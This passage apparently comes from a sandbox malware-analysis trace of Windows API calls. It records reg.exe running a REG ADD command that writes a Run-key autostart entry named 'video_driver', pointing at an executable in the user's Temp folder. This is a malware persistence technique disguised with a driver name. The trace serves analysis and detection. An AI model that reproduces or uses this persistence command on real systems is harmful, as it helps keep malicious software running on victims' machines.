GetEnvironmentStringsW () returned 0x844520* [0038.606] GetProcessHeap () returned 0x830000 [0038.606] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0xb36) returned 0x845060 [0038.606] FreeEnvironmentStringsW (penv=0x844520) returned 1 [0038.606] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0039.216] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3cf090 | out: lpExitCode=0x3cf090*=0x0) returned 1 [0039.216] CloseHandle (hObject=0x78) returned 1 [0039.217] _vsnwprintf (in: _Buffer=0x3cf1d8, _BufferCount=0x13, _Format="%08X", _ArgList=0x3cf09c | out: _Buffer="00000000") returned 8 [0039.217] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0039.217] GetProcessHeap () returned 0x830000 [0039.217] HeapFree (in: hHeap=0x830000, dwFlags=0x0, lpMem=0x845060 | out: hHeap=0x830000) returned 1 [0039.217] GetEnvironmentStringsW () returned 0x844520* [0039.217] GetProcessHeap () returned 0x830000 [0039.217] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0xb5c) returned 0x845088 [0039.217] FreeEnvironmentStringsW (penv=0x844520) returned 1 [0039.217] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0039.217] GetProcessHeap () returned 0x830000 [0039.217] HeapFree (in: hHeap=0x830000, dwFlags=0x0, lpMem=0x845088 | out: hHeap=0x830000) returned 1 [0039.217] GetEnvironmentStringsW () returned 0x844520* [0039.217] GetProcessHeap () returned 0x830000 [0039.217] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0xb5c) returned 0x845088 [0039.217] FreeEnvironmentStringsW (penv=0x844520) returned 1 [0039.217] GetProcessHeap () returned 0x830000 [0039.217] HeapFree (in: hHeap=0x830000, dwFlags=0x0, lpMem=0x840088 | out: hHeap=0x830000) returned 1 [0039.217] DeleteProcThreadAttributeList (in: lpAttributeList=0x3cf0f4 | out: lpAttributeList=0x3cf0f4) [0039.217] _get_osfhandle (_FileHandle=1) returned 0x7 [0039.217] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0039.218] _get_osfhandle (_FileHandle=1) returned 0x7 [0039.218] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8341ac | out: lpMode=0x4a8341ac) returned 1 [0039.218] _get_osfhandle (_FileHandle=0) returned 0x3 [0039.218] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8341b0 | out: lpMode=0x4a8341b0) returned 1 [0039.218] SetConsoleInputExeNameW () returned 0x1 [0039.218] GetConsoleOutputCP () returned 0x1b5 [0039.218] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a834260 | out: lpCPInfo=0x4a834260) returned 1 [0039.218] SetThreadUILanguage (LangId=0x0) returned 0x409 [0039.219] exit (_Code=0) Process: id = "4" image_name = "reg.exe" filename = "c:\\windows\\syswow64\\reg.exe" page_root = "0x4a55e000" os_pid = "0xb8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xa98" cmd_line = "REG ADD \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"video_driver\" /t REG_SZ /d \"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe\" /f" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 4 os_tid = 0x9d8 [0039.180] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcf8dc | out: lpSystemTimeAsFileTime=0xcf8dc*(dwLowDateTime=0xfe04dae0, dwHighDateTime=0x1d623ff)) [0039.180] GetCurrentProcessId () returned 0xb8c [0039.180] GetCurrentThreadId () returned 0x9d8 [0039.180] GetTickCount () returned 0x1145033 [0039.180] QueryPerformanceCounter (in: lpPerformanceCount=0xcf8d4 | out: lpPerformanceCount=0xcf8d4*=15931325687) returned 1 [0039.181] GetModuleHandleA (lpModuleName=0x0) returned 0x8a0000 [0039.181] __set_app_type (_Type=0x1) [0039.184] __p__fmode () returned 0x770331f4 [0039.184] __p__commode () returned 0x770331fc [0039.184] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x8ad4f9) returned 0x0 [0039.184] __wgetmainargs (in: _Argc=0x8af030, _Argv=0x8af038, _Env=0x8af034, _DoWildCard=0, _StartInfo=0x8af010 | out: _Argc=0x8af030, _Argv=0x8af038, _Env=0x8af034) returned 0 [0039.185] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0039.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0039.186] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0xcf85c | out: phkResult=0xcf85c*=0x0) returned 0x2 [0039.186] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0039.186] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0039.186] GetProcessHeap () returned 0x370000 [0039.186] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x10) returned 0x37f188 [0039.187] lstrlenW (lpString="") returned 0 [0039.187] GetProcessHeap () returned 0x370000 [0039.187] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x2) returned 0x384d90 [0039.187] GetProcessHeap () returned 0x370000 [0039.187] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x14) returned 0x384da0 [0039.187] GetProcessHeap () returned 0x370000 [0039.187] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x10) returned 0x37f1a0 [0039.187] GetProcessHeap () returned 0x370000 [0039.187] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x14) returned 0x384dc0 [0039.187] GetProcessHeap () returned 0x370000 [0039.187] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x14) returned 0x384de0 [0039.187] GetProcessHeap () returned 0x370000 [0039.187] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x14) returned 0x384e00 [0039.187] GetProcessHeap () returned 0x370000 [0039.187] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x14) returned 0x384e20 [0039.187] GetProcessHeap () returned 0x370000 [0039.187] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x10) returned 0x37f1b8 [0039.187] GetProcessHeap () returned 0x370000 [0039.187] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x14) returned 0x384e40 [0039.187] GetProcessHeap () returned 0x370000 [0039.187] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x14) returned 0x384e60 [0039.187] GetProcessHeap () returned 0x370000 [0039.187] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x14) returned 0x384e80 [0039.187] GetProcessHeap () returned 0x370000 [0039.187] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x14) returned 0x384ea0 [0039.187] GetProcessHeap () returned 0x370000 [0039.187] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x10) returned 0x37f1d0 [0039.187] GetProcessHeap () returned 0x370000 [0039.187] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x14) returned 0x384ec0 [0039.187] GetProcessHeap () returned 0x370000 [0039.187] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x14) returned 0x384ee0 [0039.187] GetProcessHeap () returned 0x370000 [0039.187] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x14) returned 0x384f00 [0039.187] GetProcessHeap () returned 0x370000 [0039.187] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x14) returned 0x384f38 [0039.187] SetThreadUILanguage (LangId=0x0) returned 0x409 [0039.188] GetProcessHeap () returned 0x370000 [0039.188] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x10) returned 0x37f1e8 [0039.188] _memicmp (_Buf1=0x37f1e8, _Buf2=0x8a1318, _Size=0x7) returned 0 [0039.188] GetProcessHeap () returned 0x370000 [0039.188] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x1e) returned 0x383f20 [0039.188] lstrlenW (lpString="HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 64 [0039.188] GetProcessHeap () returned 0x370000 [0039.188] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x10) returned 0x37f200 [0039.188] _memicmp (_Buf1=0x37f200, _Buf2=0x8a1318, _Size=0x7) returned 0 [0039.188] GetProcessHeap () returned 0x370000 [0039.188] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x88) returned 0x3858a0 [0039.188] _vsnwprintf (in: _Buffer=0x383f20, _BufferCount=0xe, _Format="|%s|", _ArgList=0xcf778 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0039.188] _vsnwprintf (in: _Buffer=0x3858a0, _BufferCount=0x43, _Format="|%s|", _ArgList=0xcf778 | out: _Buffer="|HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run|") returned 66 [0039.188] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0039.188] lstrlenW (lpString="|HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run|") returned 66 [0039.188] SetLastError (dwErrCode=0x490) [0039.188] lstrlenW (lpString="HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 64 [0039.188] GetProcessHeap () returned 0x370000 [0039.188] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x82) returned 0x385930 [0039.188] lstrlenW (lpString="HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 64 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x59) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x49) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0039.189] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0039.190] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0039.191] lstrlenW (lpString="HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 64 [0039.191] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0039.191] lstrlenW (lpString="HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 64 [0039.191] lstrlenW (lpString="HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 64 [0039.191] StrChrIW (lpStart="HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" [0039.191] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0039.191] GetProcessHeap () returned 0x370000 [0039.191] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x28) returned 0x385ae8 [0039.192] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_LOCAL_MACHINE", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 3 [0039.192] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_LOCAL_MACHINE", cchCount1=-1, lpString2="HKEY_CURRENT_USER", cchCount2=-1) returned 3 [0039.192] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_LOCAL_MACHINE", cchCount1=-1, lpString2="HKCR", cchCount2=-1) returned 3 [0039.192] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_LOCAL_MACHINE", cchCount1=-1, lpString2="HKEY_CLASSES_ROOT", cchCount2=-1) returned 3 [0039.192] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_LOCAL_MACHINE", cchCount1=-1, lpString2="HKCC", cchCount2=-1) returned 3 [0039.192] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_LOCAL_MACHINE", cchCount1=-1, lpString2="HKEY_CURRENT_CONFIG", cchCount2=-1) returned 3 [0039.192] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_LOCAL_MACHINE", cchCount1=-1, lpString2="HKLM", cchCount2=-1) returned 1 [0039.192] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_LOCAL_MACHINE", cchCount1=-1, lpString2="HKEY_LOCAL_MACHINE", cchCount2=-1) returned 2 [0039.192] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0039.192] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0039.192] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0039.192] StrChrIW (lpStart="Software\\Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\Microsoft\\Windows\\CurrentVersion\\Run" [0039.192] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0039.192] StrChrIW (lpStart="Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\Windows\\CurrentVersion\\Run" [0039.192] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0039.192] StrChrIW (lpStart="Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\CurrentVersion\\Run" [0039.192] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0039.192] StrChrIW (lpStart="CurrentVersion\\Run", wMatch=0x5c) returned="\\Run" [0039.192] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0039.192] StrChrIW (lpStart="Run", wMatch=0x5c) returned 0x0 [0039.192] SetLastError (dwErrCode=0x490) [0039.192] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0039.192] SetLastError (dwErrCode=0x0) [0039.192] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0039.192] GetProcessHeap () returned 0x370000 [0039.193] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x5c) returned 0x385b18 [0039.193] GetProcessHeap () returned 0x370000 [0039.193] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x88) returned 0x385b80 [0039.193] GetProcessHeap () returned 0x370000 [0039.193] GetProcessHeap () returned 0x370000 [0039.193] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385ae8) returned 1 [0039.193] GetProcessHeap () returned 0x370000 [0039.193] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385ae8) returned 0x28 [0039.193] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385ae8 | out: hHeap=0x370000) returned 1 [0039.193] GetProcessHeap () returned 0x370000 [0039.193] GetProcessHeap () returned 0x370000 [0039.193] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385930) returned 1 [0039.193] GetProcessHeap () returned 0x370000 [0039.193] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385930) returned 0x82 [0039.193] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385930 | out: hHeap=0x370000) returned 1 [0039.193] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0039.193] lstrlenW (lpString="video_driver") returned 12 [0039.193] GetProcessHeap () returned 0x370000 [0039.193] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x1a) returned 0x383f48 [0039.193] lstrlenW (lpString="video_driver") returned 12 [0039.193] StrChrW (lpStart=" \x09", wMatch=0x76) returned 0x0 [0039.193] StrChrW (lpStart=" \x09", wMatch=0x76) returned 0x0 [0039.193] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0039.193] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0039.194] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0039.194] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0039.194] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0039.194] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0039.194] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0039.194] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0039.194] StrChrW (lpStart=" \x09", wMatch=0x76) returned 0x0 [0039.194] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0039.194] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0039.194] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0039.194] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0039.194] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0039.194] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0039.194] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 2 [0039.194] StrDupW (lpSrch="REG_SZ") returned="REG_SZ" [0039.194] lstrlenW (lpString="REG_SZ") returned 6 [0039.194] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0039.194] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0039.194] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0039.194] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0039.194] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0039.194] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0039.194] StrChrW (lpStart=" \x09", wMatch=0x5a) returned 0x0 [0039.194] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_SZ", cchCount1=-1, lpString2="REG_SZ", cchCount2=-1) returned 2 [0039.195] LocalFree (hMem=0x37f218) returned 0x0 [0039.195] SetLastError (dwErrCode=0x0) [0039.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0039.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0039.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0039.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0039.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0039.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0039.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0039.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0039.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 2 [0039.195] lstrlenW (lpString="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe") returned 53 [0039.195] GetProcessHeap () returned 0x370000 [0039.195] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x6c) returned 0x385930 [0039.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0039.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0039.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0039.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0039.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0039.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0039.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0039.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0039.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0039.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 1 [0039.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0039.195] SetLastError (dwErrCode=0x0) [0039.195] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0xcf80c, lpdwDisposition=0xcf7e4 | out: phkResult=0xcf80c*=0x70, lpdwDisposition=0xcf7e4*=0x2) returned 0x0 [0039.196] RegQueryValueExW (in: hKey=0x70, lpValueName="video_driver", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x2 [0039.196] lstrlenW (lpString="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe") returned 53 [0039.196] RegSetValueExW (in: hKey=0x70, lpValueName="video_driver", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe", cbData=0x6c | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe") returned 0x0 [0039.197] RegCloseKey (hKey=0x70) returned 0x0 [0039.197] GetProcessHeap () returned 0x370000 [0039.197] GetProcessHeap () returned 0x370000 [0039.197] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385b18) returned 1 [0039.197] GetProcessHeap () returned 0x370000 [0039.197] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385b18) returned 0x5c [0039.197] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385b18 | out: hHeap=0x370000) returned 1 [0039.197] GetProcessHeap () returned 0x370000 [0039.197] GetProcessHeap () returned 0x370000 [0039.198] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385b80) returned 1 [0039.198] GetProcessHeap () returned 0x370000 [0039.198] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385b80) returned 0x88 [0039.198] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385b80 | out: hHeap=0x370000) returned 1 [0039.198] GetProcessHeap () returned 0x370000 [0039.198] GetProcessHeap () returned 0x370000 [0039.198] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x383f48) returned 1 [0039.198] GetProcessHeap () returned 0x370000 [0039.198] RtlSizeHeap 